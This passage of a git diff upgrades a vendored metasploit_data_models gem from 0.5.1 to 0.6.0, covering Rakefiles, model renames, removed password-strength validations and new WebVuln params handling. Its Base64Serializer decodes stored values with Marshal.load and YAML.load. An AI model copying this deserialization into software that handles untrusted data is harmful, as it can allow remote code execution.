lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_sites.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_vulns.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/workspaces.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/lib/base64_serializer_spec.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/spec_helper.rb (66%) rename lib/gemcache/ruby/1.9.1/specifications/{metasploit_data_models-0.5.1.gemspec => metasploit_data_models-0.6.0.gemspec} (97%) diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile deleted file mode 100755 index b582299d61..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile +++ /dev/null @@ -1,20 +0,0 @@ -#!/usr/bin/env rake -begin - require 'bundler/setup' -rescue LoadError - puts 'You must `gem install bundler` and `bundle install` to run rake tasks' -end - - -APP_RAKEFILE = File.expand_path('../spec/dummy/Rakefile', __FILE__) -load 'rails/tasks/engine.rake' - -Bundler::GemHelper.install_tasks - -require 'rspec/core/rake_task' - -RSpec::Core::RakeTask.new(:spec) -task :default => :spec - -load 'lib/tasks/yard.rake' - diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/base64_serializer.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/base64_serializer.rb deleted file mode 100755 index b209aa39cc..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/base64_serializer.rb +++ /dev/null @@ -1,35 +0,0 @@ -# 2012-04-23 -# -# Provides ActiveRecord 3.1x-friendly serialization for descendants of -# ActiveRecord::Base. Backwards compatible with older YAML methods and -# will fall back to string decoding in the worst case -# -# usage: -# serialize :foo, MetasploitDataModels::Base64Serializer.new -# -module MetasploitDataModels - class Base64Serializer - def load(value) - return {} if value.blank? - begin - # Load the unpacked Marshal object first - Marshal.load(value.unpack('m').first) - rescue - begin - # Support legacy YAML encoding for existing data - YAML.load(value) - rescue - # Fall back to string decoding - value - end - end - end - - def dump(value) - # Always store data back in the Marshal format - [ Marshal.dump(value) ].pack('m') - end - end -end - - diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/engine.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/engine.rb deleted file mode 100644 index 27f7df2994..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/engine.rb +++ /dev/null @@ -1,7 +0,0 @@ -require 'rails' - -module MetasploitDataModels - class Engine < Rails::Engine - - end -end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/lib/base64_serializer_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/lib/base64_serializer_spec.rb deleted file mode 100755 index ace44fcdac..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/lib/base64_serializer_spec.rb +++ /dev/null @@ -1,22 +0,0 @@ -require "spec_helper" - -module MetasploitDataModels - describe Base64Serializer do - subject{Base64Serializer.new} - - let(:test_value){{:foo => "bar", :baz => "baz"}} - - # We make it same way as in class b/c hard to keep a reliable base64 - # string literal as a fixture - let(:base64_fixture){[Marshal.dump(test_value)].pack('m')} - - it "should turn a Hash into proper base64" do - subject.dump(test_value).should == base64_fixture - end - - it "should turn base64 back into a Hash" do - subject.load(base64_fixture).should == test_value - end - end -end - diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.gitignore b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.gitignore similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.gitignore rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.gitignore diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.rspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.rspec similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.rspec rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.rspec diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.simplecov similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.simplecov diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.yardopts similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.yardopts diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Gemfile similarity index 79% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Gemfile index c4e6b487cb..f153705da3 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Gemfile @@ -6,6 +6,9 @@ gemspec # used by dummy application group :development, :test do # supplies factories for producing model instance for specs + # Version 4.1.0 or newer is needed to support generate calls without the 'FactoryGirl.' in factory definitions syntax. + gem 'factory_girl', '>= 4.1.0' + # auto-load factories from spec/factories gem 'factory_girl_rails' # rails is only used for the dummy application in spec/dummy gem 'rails' diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/LICENSE b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/LICENSE similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/LICENSE rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/LICENSE diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/README.md b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/README.md similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/README.md rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/README.md diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Rakefile new file mode 100755 index 0000000000..8fd6dc482f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Rakefile @@ -0,0 +1,34 @@ +#!/usr/bin/env rake +begin + require 'bundler/setup' +rescue LoadError + puts 'You must `gem install bundler` and `bundle install` to run rake tasks' +end + +APP_RAKEFILE = File.expand_path('../spec/dummy/Rakefile', __FILE__) +load 'rails/tasks/engine.rake' + +Bundler::GemHelper.install_tasks + +# +# load rake files like a normal rails app +# @see http://viget.com/extend/rails-engine-testing-with-rspec-capybara-and-factorygirl +# + +pathname = Pathname.new(__FILE__) +root = pathname.parent +rakefile_glob = root.join('lib', 'tasks', '**', '*.rake').to_path + +Dir.glob(rakefile_glob) do |rakefile| + load rakefile +end + +require 'rspec/core' +require 'rspec/core/rake_task' + +# Depend on app:db:test:prepare so that test database is recreated just like in a full rails app +# @see http://viget.com/extend/rails-engine-testing-with-rspec-capybara-and-factorygirl +RSpec::Core::RakeTask.new(:spec => 'app:db:test:prepare') + +task :default => :spec + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/api_key.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/api_key.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/api_key.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/api_key.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/client.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/client.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/client.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/client.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/cred.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/cred.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/cred.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/event.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/event.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/event.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploit_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/exploit_attempt.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploit_attempt.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/exploit_attempt.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploited_host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/exploited_host.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploited_host.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/exploited_host.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host_tag.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_tag.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host_tag.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/imported_cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/imported_cred.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/imported_cred.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/imported_cred.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/listener.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/listener.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/listener.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/listener.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/loot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/loot.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/loot.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/loot.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/macro.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/macro.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/macro.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/macro.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/mod_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/mod_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/mod_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/mod_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_action.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_action.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_action.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_action.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_arch.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_arch.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_arch.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_arch.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_author.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_author.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_author.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_author.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_mixin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_mixin.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_mixin.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_mixin.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_platform.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_platform.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_platform.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_platform.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_target.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_target.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_target.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/nexpose_console.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/nexpose_console.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/nexpose_console.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/nexpose_console.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/note.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/note.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/note.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/note.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/profile.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/profile.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/profile.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/profile.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/report.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/report.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report_template.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/report_template.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report_template.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/report_template.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/route.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/route.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/route.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/route.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/service.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/service.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/service.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/service.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/session.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/session.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session_event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/session_event.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session_event.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/session_event.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/tag.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/tag.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/tag.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/task.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/task.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/task.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/task.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/user.rb similarity index 87% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/user.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/user.rb index bdc5baae21..c727f8507f 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/user.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/user.rb @@ -20,13 +20,6 @@ class Mdm::User < ActiveRecord::Base serialized_prefs_attr_accessor :time_zone, :session_key serialized_prefs_attr_accessor :last_login_address # specifically NOT last_login_ip to prevent confusion with AuthLogic magic columns (which dont work for serialized fields) - # - # Validations - # - - validates :password, :password_is_strong => true - validates :password_confirmation, :password_is_strong => true - ActiveSupport.run_load_hooks(:mdm_user, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_attempt.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_attempt.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_attempt.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_form.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_form.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_form.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_form.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_page.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_page.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_page.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_page.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_site.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_site.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_site.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_site.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_vuln.rb similarity index 72% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_vuln.rb index 4577818842..5d9df893c7 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_vuln.rb @@ -1,6 +1,6 @@ # A Web Vulnerability found during a web scan or web audit. # -# If you need to modify Mdm::WebVuln you can use ActiveSupport.on_load(:mdm_web_vuln) in side an initializer so that +# If you need to modify Mdm::WebVuln you can use ActiveSupport.on_load(:mdm_web_vuln) inside an initializer so that # your patches are reloaded on each request in development mode for your Rails application. # # @example extending Mdm::WebVuln @@ -19,6 +19,9 @@ class Mdm::WebVuln < ActiveRecord::Base # shouldn't be an {Mdm::WebVuln} record if there is 0% {#confidence} in the the finding. CONFIDENCE_RANGE = 1 .. 100 + # Default value for {#params} + DEFAULT_PARAMS = [] + # Allowed {#method methods}. METHODS = [ 'GET', @@ -120,7 +123,6 @@ class Mdm::WebVuln < ActiveRecord::Base } validates :name, :presence => true validates :path, :presence => true - validates :params, :presence => true validates :pname, :presence => true validates :proof, :presence => true validates :risk, @@ -136,8 +138,53 @@ class Mdm::WebVuln < ActiveRecord::Base # @!attribute [rw] params # Parameters sent as part of request # - # @return [Array>] Array of parameter key value pairs - serialize :params, MetasploitDataModels::Base64Serializer.new + # @return [Array>] Array of parameter key value pairs + serialize :params, MetasploitDataModels::Base64Serializer.new(:default => DEFAULT_PARAMS) + + # + # Methods + # + + # Parameters sent as part of request. + # + # @return [Array>] + def params + normalize_params( + read_attribute(:params) + ) + end + + # Set parameters sent as part of request. + # + # @param params [Array>, nil] Array of parameter key value pairs + # @return [void] + def params=(params) + write_attribute( + :params, + normalize_params(params) + ) + end + + private + + # Creates a duplicate of {DEFAULT_PARAMS} that is safe to modify. + # + # @return [Array] an empty array + def default_params + DEFAULT_PARAMS.dup + end + + # Returns either the given params or {DEFAULT_PARAMS} if params 